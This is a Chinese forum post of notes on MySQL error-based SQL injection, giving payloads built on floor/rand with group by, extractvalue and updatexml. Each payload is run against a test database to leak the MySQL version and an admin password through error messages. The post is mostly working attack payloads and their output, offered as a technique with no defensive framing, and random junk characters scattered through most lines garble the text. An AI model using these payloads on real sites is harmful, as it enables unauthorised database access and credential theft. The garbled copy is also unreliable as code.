放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。2 w. j; x. z" p$ c- x; h
实际测试环境:
! E* A2 K3 O' d4 g9 M; g
. L X) v; i1 [+ A
" ]" v5 \9 L$ v: g9 G( W, Y1 Fmysql> show tables;
1 F* ~. I9 g0 d- C+----------------+6 E7 e2 H" f% k
| Tables_in_test |- {4 [! k F7 V; Y0 b+ {
+----------------+2 T5 r) ?1 [% v: a, E
| admin |! U6 e+ E3 F! ?/ b
| article |3 F9 q3 E6 G, P6 `6 y
+----------------+& g/ v9 B* X% p' ? H3 N6 ]& U
: d8 z( a) L. k
1 [/ c' q/ W' Y# N4 x
, q% z, B* |8 f+ A m* ^# amysql> describe admin;
. }( B* t& X* C. n9 Q( d+-------+------------------+------+-----+---------+----------------+( M! I8 l# P7 b
| Field | Type | Null | Key | Default | Extra |9 t1 x7 Z8 U, k5 h1 n1 p6 ]7 S
+-------+------------------+------+-----+---------+----------------+: ?$ {) O1 _7 h' G' [( r- o/ X
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. O: N* r* H# j. f| user | varchar(50) | NO | | NULL | |
" ]2 P; i# ~8 v| pass | varchar(50) | NO | | NULL | |
" r8 |/ }7 e6 n" G' Y2 y9 ]% r( L+-------+------------------+------+-----+---------+----------------+
) Y2 t% x6 w! B4 q9 d I 9 @5 Z5 [# p# f, _
# w, ?1 _' |; S" t* o" J; Q) X
* {" r" \; w8 \7 y- z/ i% `mysql> describe article;& f; C0 N( K# l
+---------+------------------+------+-----+---------+----------------+
! I' z% \3 g; q| Field | Type | Null | Key | Default | Extra |
& f! e# L$ ?! _) V' B+---------+------------------+------+-----+---------+----------------+
* q5 @ u2 O0 j: x# N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 K s9 @- d+ o8 o! {. v| title | varchar(50) | NO | | NULL | |, F1 @+ U# K9 `/ L; s1 _9 b3 q* Z
| content | varchar(50) | NO | | NULL | |. M2 C! S7 x" V- J7 V" L G
+---------+------------------+------+-----+---------+----------------++ _, K9 z* n# @; H% e T, t9 w
1、通过floor报错: P; l( W' k8 u1 y
可以通过如下一些利用代码+ e2 S0 `. {/ U7 ]7 ~ [
/ f. l( s2 M/ U6 e : d ^1 T# o5 e' D8 d1 D
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x; |5 P' }* r" G; j2 _* x* |0 G
from information_schema.tables group by x)a);0 ^. [. a; h! K* l( u) d9 q
* \% u8 M( e) b: |% [
. X& Z% l; W9 R7 \) _6 L6 U6 _# Eand (select count(*) from (select 1 union select null union select !1)x
/ p# p1 i& S2 T/ D. y8 ]. G$ l' n" Tgroup by concat((select table_name from information_schema.tables limit 1),- g1 N3 z6 a8 b& B. u
floor(rand(0)*2)));! F0 Z6 {: X, p
举例如下:0 r' d: Q" {! n
首先进行正常查询:8 F3 V5 Z3 ^# P! G8 [
* }" o4 c8 D/ @, e* D& M) p7 A
mysql> select * from article where id = 1;
& f3 o" W: X6 R, Q; M [+ o& n+----+-------+---------+$ n% l) r+ E# T1 X# x( g* b7 h
| id | title | content |9 L8 N9 N( J8 s6 a% |
+----+-------+---------+
1 |9 d+ I3 O, }. X4 M8 n| 1 | test | do it |
+ T( w5 T2 \9 l! j' C" e# v+----+-------+---------+
' x' x! Q' [8 Q! k: q假如id输入存在注入的话,可以通过如下语句进行报错。
0 q) P) y3 H- {
- q. |. ~$ G7 o; I 4 w7 {: a, A& }7 |7 `. H
mysql> select * from article where id = 1 and (select 1 from
6 S8 R# z4 B, m3 k9 O& k) f(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
( d, }# C) Z1 r0 L$ j, i6 oERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'% e, u5 m2 f( f0 O2 Y. r1 e
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
) R) z; ]) B( W0 W- t- |1 n例如我们需要查询管理员用户名和密码:5 {2 }' t; ^' `: Y
Method1:
2 Y) M+ n& N& |: @0 P + H, g: e4 d$ X3 K+ `
) e% [1 v; E$ H* n+ J" E1 P, mmysql> select * from article where id = 1 and (select 1 from
3 @: f2 A4 b& x( ~(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x! `. a8 V: E t; S# `6 @: Y
from information_schema.tables group by x)a);; {2 x( I+ X: A% ^" P9 y- W
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'' R& N1 G* B& _9 r9 _
Method2:+ s' \! g+ j3 W
f5 Q; c1 g& n: [! u- i
' p2 z! i ]/ Q9 Z) t# bmysql> select * from article where id = 1 and (select count(*)
& x# ]2 O! {* r% ~. k8 q+ d, Jfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),9 ?9 O I7 D6 K$ E* M& w' R
floor(rand(0)*2)));
C" z1 p( E0 w9 Z. iERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! `1 |' x$ ]% Z
2、ExtractValue6 O6 G$ g. h' }2 [
测试语句如下
1 J9 l- @; U1 S. o ) m& W+ y0 h7 T
. O z: H) H; V8 `5 _0 vand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));5 d7 X$ L8 a' b$ K
实际测试过程
# {$ J) g6 e9 r6 F4 { , U/ }) l6 {* b( s3 T, v* n& Q
: J# n. B6 S* O6 F" Z: Cmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
: M: Q& h3 H2 ~9 `1 R. `(select pass from admin limit 1)));--
' m, x# [( s) j, u( b$ Y# yERROR 1105 (HY000): XPATH syntax error: '\admin888'1 u! J9 K9 X2 H i1 C! }$ {
3、UpdateXml
: j) [- r. `& N测试语句
2 [" I L! j2 P& _
# V5 z: V* Y& G; }' J( B " B4 \4 o5 [8 D1 P: |+ @
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))/ b8 d( D' V$ I
实际测试过程
' o5 ]' r+ x( B4 {9 H( X
- H6 q2 o& g7 K! Z# X* A; `1 j r6 o' g2 J m: H- ]( }
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! @8 {( G- [4 @- y
(select pass from admin limit 1),0x5e24),1));
. N. A: Y x9 t0 O& o( o* QERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'( T: s1 }/ J& I) d
All, thanks foreign guys.6 h. |# z9 E ?0 r( R
3 ^0 w0 x- l4 _2 v* }
. [$ s0 |! O8 G! x9 { |
发表于 2012-12-10 10:28:51
收藏
支持
反对